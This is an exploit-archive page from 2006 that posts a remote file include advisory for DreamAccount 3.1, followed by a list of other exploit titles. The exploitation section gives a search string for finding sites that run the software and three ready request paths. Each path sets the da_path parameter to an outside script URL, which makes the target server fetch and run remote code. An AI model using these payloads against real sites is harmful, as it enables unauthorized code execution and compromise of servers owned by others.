exploits , vulnerabilities , articles , DreamAccount <= 3.1 (da_path) Remote File Include Vulnerabilities

2006-06-25 DreamAccount <= 3.1 (auth.api.php) Remote File Include Exploit

2006-06-05

DreamAccount <= 3.1 (da_path) Remote File Include Vulnerabilities

Rated as : Moderate Risk

Title: DreamAccount <= 3.1 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: dreamcost.com
URL: http://dreamcost.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "powered by DreamAccount"
-----------------------------------------------------------------

Exploitation:

/auth.cookie.inc.php?da_path=http://www.yourspace.com/yourscript.php?
/auth.header.inc.php?da_path=http://www.yourspace.com/yourscript.php?
/auth.sessions.inc.php?da_path=http://www.yourspace.com/yourscript.php?


securitydot.net - 2006-06-05

Exploits - newest 10 RSS | More

2007-06-15 56717 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33835 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41951 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29058 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19522 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16502 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19168 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16366 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33306 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17029 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit